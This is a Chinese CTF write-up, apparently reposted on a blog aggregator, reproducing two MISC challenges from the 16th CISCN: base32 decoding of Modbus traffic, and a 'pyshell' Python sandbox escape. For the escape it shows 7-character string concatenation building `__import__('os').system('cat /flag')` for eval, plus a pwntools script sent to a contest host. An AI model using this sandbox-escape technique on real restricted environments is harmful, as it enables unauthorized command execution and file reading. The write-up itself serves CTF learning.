第十六届CISCN复现----MISC

这篇具有很好参考价值的文章主要介绍了第十六届CISCN复现----MISC。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.被加密的生产流量

第十六届CISCN复现----MISC

 下载附件,发现是一个文件名为modus的压缩包,解压后是一个pcap文件,用wireshark打开

文件名modus,已经提示了工控流量,很多情况下都是和TCP协议结合起来的

工控CTF之协议分析1——Modbus_ctf modbus_Shadow丶S的博客-CSDN博客

直接追踪TCP

第十六届CISCN复现----MISC

 发现竟然出现了=,条件反射联想到base密码,base32加密特征:密文由32个字符(A-Z,2-7)组成

其实第一反应还是base64,但是没做出来,才改的base32

第十六届CISCN复现----MISC

 套上flag提交的壳就成功了

在复现途中,看到了一些大佬的解题思路,很棒,很新颖,自己还需继续钻研

利用pyshark解题:

"pyshark"库是一个用于捕获、解析和分析网络流量的Python库。它是基于Wireshark开发的,可以很方便地在Python环境中使用Wireshark的功能。

python 的pyshark库如何使用 - 知乎

NSSCTF | 在线CTF平台

pyshark使用教程_迷人的派大星的博客-CSDN博客

利用tshark解题:

tshark相当于是命令行版的wireshark,不需要额外安装,在安装wireshark的时候就会安装上这个工具。建议把tshark加入到环境变量中,方便后续使用!

tshark在流量分析中的绝佳应用(超详细)_lainwith的博客-CSDN博客

第十六届全国大学生信息安全竞赛 初赛 Writeup by X1cT34m | 小绿草信息安全实验室

2.pyshell

第十六届CISCN复现----MISC

 题目标签中有一个沙盒逃逸,恕我不知道啥意思,

沙盒逃逸:

沙盒逃逸的过程就是在一个代码执行的环境下,脱离种种过滤和限制,最终拿到shell权限的过程。也就是绕过各种黑名单最终拿到系统命令执行权限。

浅析Python沙盒逃逸-腾讯云开发者社区-腾讯云

感觉有点像命令过滤,只不过这个是在python下,执行的而已

python沙箱逃逸总结 - 先知社区

 看的似懂非懂了,做一下题目

在虚拟机中进行nc连接

第十六届CISCN复现----MISC

 能发现其实此时已经进入了python

第十六届CISCN复现----MISC

 查看python内置文件可以看出语句之间需要_拼接

 通过测试和题目名称得知存在python沙盒逃逸并且一次只能输入7个字符串,使用+进行拼接调用eval函数成功执行命令

第一种:

'open'

_+"('/"

_+"fl"

_+"ag"

_+"')."

_+"re"

_+"ad"

_+"()"

_

eval(_)

exec(_)

 第二种:

>>'__imp'
'__imp'
>>_+'ort'
'__import'
>>_+'__('
'__import__('
>>_+"'os"
"__import__('os"
>>_+"')"
"__import__('os')"
>>_+".s"
"__import__('os').s"
>>_+"ys"
"__import__('os').sys"
>>_+"te"
"__import__('os').syste"
>>_+"m("
"__import__('os').system("
>>_+"'c"
"__import__('os').system('c"
>>_+'at '
"__import__('os').system('cat "
>>_+'/fl'
"__import__('os').system('cat /fl"
>>_+"ag"
"__import__('os').system('cat /flag"
>>_+"')"
"__import__('os').system('cat /flag')"
>>eval(_)

 运行成功即可获得flag

但是当自己运行时发现一直跳转,于是用了脚本来跑,同样可以获取flag文章来源地址https://www.toymoban.com/news/detail-500720.html

from pwn import *
io = remote('node1.anna.nssctf.cn', 28073)
io.send("'print'")
sleep(1)
io.send("_+'(op'")
sleep(1)
io.send("_+'en('")
sleep(1)
io.send("_+'\"/f'")
sleep(1)
io.send("_+'lag'")
sleep(1)
io.send("_+'\").'")
sleep(1)
io.send("_+'rea'")
sleep(1)
io.send("_+'d()'")
sleep(1)
io.send("_+')'")
sleep(1)
io.send('eval(_)')
flag = io.recvline()
print(flag)
io.interactive()

到了这里,关于第十六届CISCN复现----MISC的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 第十五届全国大学生信息安全竞赛知识问答(CISCN)

    一、单项选择题 1、国家秘密的保密期限,除另有规定外,绝密级不超过()年 A、10年 B、50年 C、30年 D、20年 2、安卓逆向中,反编译JAVA通常使用以下哪个软件?( ) A、JPEXS B、dnSpy C、JEB D、IDA 3、我国在信息系统安全保护方面制定的最早一部,也是最基本的一部法规是()

    2024年02月04日
    浏览(60)
  • CTF之MISC题目-简单流量

    第一篇 CTF之密码学题目-classical coding 第二篇 CTF之MISC题目-西游记 第三篇 CTF之MISC题目-简单流量 这是一道关于网络数据包分析的题目,主要是wireshark工具的使用和发现代码、理解代码。同时要了解Linux 的 Shell脚本。 可以发现是一个流量包数据(.pcapng后缀,可以用wireshark打开

    2023年04月25日
    浏览(40)
  • 2022第十五届全国大学生信息安全竞赛(ciscn)西南赛区部分WP

    EzSignin 访问题目flag是假的,F12源代码,看到base64解码 解码得到flag CODE 访问题目,有个aid.php直接访问不行,使用PHP为协议进行读取,input2需要等于Welcone!,这里要使用data协议编码一下,input3可以随便输入 得到aid.php的代码 很明显的反序列化,直接构造payload: exp: base64解码得

    2024年02月06日
    浏览(54)
  • 第十六届“华中杯”大学生数学建模挑战赛C题思路

    光纤传感技术是伴随着光纤及光通信技术发展起来的一种新型传感器技术。它是以光波为传感信号、光纤为传输载体来感知外界环境中的信号,其基本原理是当外界环境参数发生变化时,会引起光纤传感器中光波参量(如波长、相位、强度等)的变化,即外界信号变化会对光

    2024年04月25日
    浏览(34)
  • 2023第十六届“认证杯”数学建模网络挑战赛第一阶段比赛经历分享

    个人名片: 🐅作者简介:一名大二在校生,热爱生活,爱好敲码! 💅个人主页 🥇:holy-wangle ➡系列内容: 🖼️ tkinter前端窗口界面创建与优化 🖼️ Java实现ATP小系统 ✨个性签名: 🍭不积跬步,无以至千里;不积小流,无以成江海          好久没写文章了,今天

    2024年02月10日
    浏览(49)
  • 网络空间安全市赛Misc一道简单的流量分析题

    题目介绍: 1、使用Wireshark查看并分析服务器桌面下的attack.pcapng数据包文件,通过分析数据包attack.pcapng找出黑客的IP地址,并将黑客的IP地址作为FLAG(形式:[IP地址])提交 2、继续查看数据包文件attack.pacapng,分析出黑客扫描了哪些端口,并将全部的端口作为FLAG(形式:[端口

    2024年02月09日
    浏览(39)
  • 第十六届“华中杯”大学生数学建模挑战赛(B题)深度剖析|建模完整过程+详细思路+代码全解析

    问题1的建模过程如下: 假设信号灯周期固定不变,且已知所有车辆的行车轨迹,我们可以建立如下模型来估计信号灯的红绿周期: 首先,我们需要定义一些符号: T s i g n a l T_{signal} T s i g na l ​ :信号灯的红绿周期,单位为秒 T t r a c k T_{track} T t r a c k ​ :车辆行车轨迹数

    2024年04月28日
    浏览(88)
  • BUUCTF MISC zip伪加密

    下载下来的压缩包是加密的,暴力破解也没有找到密码 题目是伪加密,看一下压缩包的十六进制内容 一个加密的压缩包,由三部分组成:压缩源文件数据区、压缩源文件目录区、压缩源文件目录结束标志(更详细的请见:一个zip文件由这样三个部分组成_一只独孤的程序猿的博

    2023年04月09日
    浏览(43)
  • gor工具http流量复制、流量回放,生产运维生气

     gor是一款流量复制回放工具,gor工具的官网:https://goreplay.org/ 1、对某个端口的http流量进行打印  2、对流量实时转发,把81端口流量转发到192.168.3.221:80端口 3、把抓取到的流量以文件的形式存储到磁盘上 4、对抓取到的流量进行回放 5、快速开一个静态服务器 6、gor的运行参

    2024年02月12日
    浏览(46)
  • shiro漏洞复现及其攻击流量分析

    最近面试时经常被问到,每次说的都不太完美,现在再来复现一边。 Apache Shiro是一个开源安全框架,提供身份验证、授权、密码学和会话管理。 利用vulhub搭建的靶场。 在Apache Shiro = 1.2.4版本中存在反序列化漏洞。 该漏洞成因在于,Shiro的“记住我”功能是设置cookie中的reme

    2024年02月06日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包